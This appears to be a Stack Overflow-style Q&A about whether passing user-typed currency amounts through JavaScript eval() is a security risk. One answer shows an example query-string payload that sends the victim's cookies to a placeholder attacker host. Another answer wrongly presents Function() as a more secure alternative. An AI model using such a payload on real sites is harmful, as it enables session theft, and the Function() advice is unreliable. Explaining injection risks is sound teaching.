Possible Duplicate:
When is JavaScript’s eval() not evil?
I am writing a script in which users have to type in a currency amount. Some examples could be (user input >> converts to), with USD as the default currency:
50 >> 50.0 USD
50.5 >> 50.5 USD
50+1 USD >> 51.0 USD
50 GBP >> 50.0 GBP
I want to make this as smooth as possible; therefore I want to use JavaScript (it's a web app based on PHP/MySql + JavaScript). I want to use regex to filter the input, run it through eval() and return it.
Is this a bad idea? I've read some topics about eval() being a security issue. I just don't see how. A user can easily run JavaScript anyway?
Keep in mind that I will validate all input server-side with PHP at a later stage.
Malicious code: invoking eval can crash a computer. For example, if you use eval server-side and a mischievous user decides to use an infinite loop as their username.
Terribly slow: the JavaScript language is designed to use the full gamut of JavaScript types (numbers, functions, objects, etc.), not just strings!
Executing JavaScript from a string is a BIG security risk. With eval(), malicious code can run inside your application without permission. With eval(), third-party code can see the scope of your application, which can lead to possible attacks.
Calling eval() will be slower than using alternatives, because it has to call the JavaScript interpreter, which will convert the evaluated code to machine language. That means if you run the code more than once, the browser will have to interpret the same code again, which is highly inefficient.
An alternative to eval is Function(). Just like eval(), Function() takes some expression as a string for execution, except that, rather than outputting the result directly, it returns an anonymous function to you that you can call. Function() is a faster and more secure alternative to eval().
You're right that an end user can easily execute arbitrary JavaScript anyway via the browser's developer console (I do this all the time). What you have to worry about is an attacker hijacking your feature that uses eval for his own ends.
The reason eval is generally considered dangerous is because it is very easy for untrusted code to sneak in. Consider a page that allows you to specify input via the query string, where the input box is prepopulated with the value in the query string.
An attacker could spread a link that contains code which steals a user's login cookie:
/some/url?amount=var i=new Image();i.src='http://badguy.ru/x?' + document.cookie;
(Obviously proper URL encoding is required; this is for illustration.)
Or, perhaps your PHP script echoes posted data back into your form when validation fails. An attacker could create a specially crafted form that posts to your form with the same cookie-stealing code.
Each of these attacks can be mitigated by using httpOnly cookies (to prevent stolen login cookies) or making sure that data is sanitized – but the point is this isn't even close to an exhaustive list of how things can go wrong. For example, an injected script could still insert 1000 in the amount field and try to transfer that amount to the attacker's account (if this is a money transfer page).
Even the fact that you're using a regex to sanitize input doesn't necessarily protect you: it's possible to write arbitrary JavaScript entirely with brackets!
So the bottom line is that if you can make absolutely sure that the only way input makes its way into your text field is via user input, you're fine: the user hasn't gained anything they wouldn't be able to do otherwise via the console. However, if an attacker can somehow get their own data into that field, evaling it may expose you to a vulnerability.